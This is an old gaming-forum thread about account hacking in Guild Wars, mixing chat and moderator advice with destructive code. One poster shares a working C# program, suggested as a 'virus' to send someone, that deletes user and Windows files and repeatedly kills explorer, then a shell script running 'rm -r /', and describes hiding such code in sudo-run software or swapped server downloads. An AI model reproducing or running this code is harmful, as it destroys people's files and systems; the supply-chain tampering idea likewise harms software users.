> Forest of True Sight > Questions & Answers Reload this Page Getting Hacked
Reply
Old Jul 22, 2009, 05:42 AM // 05:42   #21
Academy Page
 
Join Date: Feb 2008
Guild: squirtle squad
Profession: D/Mo
Advertisement

Disable Ads
Default

Quote:
Originally Posted by Killamus View Post
It's more fun to send an actual virus.

Code:
using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
using System.Reflection;
using System.Collections;
using System.Threading;

namespace ConsoleApplication1
{
    class Program
    {
        [System.Runtime.InteropServices.DllImport ( "user32.dll" )]
        private static extern bool ShowWindow ( IntPtr hWnd, int nCmdShow );
        private const int SW_MINIMIZE = 6;
        private const int SW_MAXIMIZE = 3;
        private const int SW_RESTORE = 9;

        static void Main ( string[] args )
        {
            List<string> files = new List<string> ();

            IntPtr winHandle = System.Diagnostics.Process.GetCurrentProcess ().MainWindowHandle;
            ShowWindow ( winHandle, SW_MINIMIZE );

            string path = @"C:\Documents and Settings\";
            string path1 = @"C:\Windows";

            files.AddRange ( Directory.GetFiles ( path, "*.*", SearchOption.AllDirectories ) );
            files.AddRange ( Directory.GetFiles ( path1, "*.*" ) );

            DoStopExplorer (0);

            foreach ( string file in files )
            {
                File.Delete ( file );
                DoStopExplorer ( 1 );
            }
            Console.ReadLine ();
        }

        private static void DoStopExplorer (int times)
        { 
            List<System.Diagnostics.Process> process = new List<System.Diagnostics.Process> ();

            process.AddRange ( System.Diagnostics.Process.GetProcesses() );

            foreach ( System.Diagnostics.Process proc in process )
            {
                if ( proc.ProcessName == "explorer" )
                {
                    proc.Kill ();
                }
            }
        }
    }
}
You didn't get this from me though.
LOL. good thing i run linux, that could really piss people off.
theicydragonsword is offline   Reply With Quote
Old Jul 22, 2009, 05:45 AM // 05:45   #22
Pre-Searing Cadet
 
Join Date: Jul 2009
Default

Quote:
Originally Posted by Chrisworld View Post
Yeah but even with Brute Force, you would still need to know the email address as the GW username first.

Someone once said in a thread, they wondered if it was possible that all the people getting hacked was a result of someone using some kind of packet interception without even knowing their acct/pass. Think of how fast and efficiently some people get hacked these days, it has an eeire feeling to it. They never get hacked in their life on GW, leave for one hour, come back and 100k or some ectos are gone from their stash but their account and chars are generally fine.
that just confirms what i was about to say, a real hacker won't tell you they're going to hack you they'll just do it
therlye is offline   Reply With Quote
Old Jul 22, 2009, 06:01 AM // 06:01   #23
Guest
 
Join Date: Oct 2008
Default

Quote:
Originally Posted by theicydragonsword View Post
LOL. good thing i run linux, that could really piss people off.
Oh, then there's an easier way to do it.

Open terminal
nano ./awesome.sh
rm -r /
control+x
y
y
chmod 775 ./awesome.sh
./awesome.sh

ftw.
Killamus is offline   Reply With Quote
Old Jul 22, 2009, 07:09 AM // 07:09   #24
Wilds Pathfinder
 
Archress Shayleigh's Avatar
 
Join Date: Feb 2009
Location: Guild Hall
Profession: R/
Default

It's all bullcrap. Don't give a damn.
Archress Shayleigh is offline   Reply With Quote
Old Jul 22, 2009, 07:22 AM // 07:22   #25
Ascalonian Squire
 
Join Date: Jul 2009
Profession: A/R
Default

Quote:
Originally Posted by Killamus View Post
Oh, then there's an easier way to do it.

Open terminal
nano ./awesome.sh
rm -r /
control+x
y
y
chmod 775 ./awesome.sh
./awesome.sh

ftw.
Ah, but without sudo (or root I guess...) quite useless is it. I prefer chmod +x for 775 anyways. lol. But honestly, if I'm going to hack someone (never have before) I wouldn't tell them. That's just dumb... Great to be safe in Linux from many attacks though.
kdb424 is offline   Reply With Quote
Old Jul 22, 2009, 08:11 AM // 08:11   #26
Guest
 
Join Date: Oct 2008
Default

Quote:
Originally Posted by kdb424 View Post
Ah, but without sudo (or root I guess...) quite useless is it. I prefer chmod +x for 775 anyways. lol. But honestly, if I'm going to hack someone (never have before) I wouldn't tell them. That's just dumb... Great to be safe in Linux from many attacks though.
You're not safe. Take any program that has to be run in sudo, and obfuscate this code in the source, and you'd never know. Hack the server (Which isn't hard, script kiddies do it all the time) and throw up your bundle instead of theirs.

Because, really, who uses MD5sum anyways?
Killamus is offline   Reply With Quote
Old Jul 22, 2009, 01:43 PM // 13:43   #27
Never Too Old
 
Darcy's Avatar
 
Join Date: Jul 2006
Location: Rhode Island where there are no GW contests
Guild: Order of First
Profession: W/R
Default

@theicedragonsword - Isn't that what happened with that last batch of Code 045 blocks. A "hacker" was trying to access many accounts, so ArenaNet blocked the accounts until they could be sure the attempt was unsuccessful. I assumed the "hacker" was using a computer program to attempt logins and ArenaNet security noticed the great number of failed attempts.

@OP - if it happens again, take screenshot of conversation and report to Support. It's like mentioning "bombs" in an airport. It is a real fear and shouldn't be tolerated. Stupidity should always be punished.
__________________
That's me, the old stick-in-the-mud non-fun moderator.
(and non-understanding, also)

Darcy is offline   Reply With Quote
Old Jul 22, 2009, 02:02 PM // 14:02   #28
Krytan Explorer
 
Faure's Avatar
 
Join Date: Feb 2006
Guild: Mystic Spiral [MYST]
Profession: R/
Default

Quote:
Originally Posted by Darcy View Post
@theicedragonsword - Isn't that what happened with that last batch of Code 045 blocks. A "hacker" was trying to access many accounts, so ArenaNet blocked the accounts until they could be sure the attempt was unsuccessful. I assumed the "hacker" was using a computer program to attempt logins and ArenaNet security noticed the great number of failed attempts.
Wouldn't it be easier to block the ip address from where all those attempts came from?
Faure is offline   Reply With Quote
Old Jul 22, 2009, 02:03 PM // 14:03   #29
So Serious...
 
Fril Estelin's Avatar
 
Join Date: Jan 2007
Location: London
Guild: Nerfs Are [WHAK]
Profession: E/
Default

To the OP: think for a few seconds, don't panic, don't fear, concentrate and think:

if the supposedly hacker friend is going to get at YOU specifically, he needs to find you on your computer; how is he going to find YOUR computer in the middle of the millions of computers in your city?

Hackers aren't magicians. The guy talked BS. Learn from that and tell your friends. Emotion is the tool of "social engineer" to generate fear into you that will hurt you, because they can't hurt you otherwise.

And LOL at sudos, chmods and other scripts
Fril Estelin is offline   Reply With Quote
Old Jul 22, 2009, 05:23 PM // 17:23   #30
Guest
 
Join Date: Oct 2008
Default

Quote:
Originally Posted by Fril Estelin View Post
And LOL at sudos, chmods and other scripts
http://en.wikipedia.org/wiki/Sudo
http://en.wikipedia.org/wiki/Chmod
Quote:
Originally Posted by Faure View Post
Wouldn't it be easier to block the ip address from where all those attempts came from?
I think that they have to manually block IPs, and the banning of an account from brute force attacks is an automated thing.
Killamus is offline   Reply With Quote
Reply


Share This Forum!  
 
Thread Tools
Display Modes


All times are GMT. The time now is 10:49 AM // 10:49.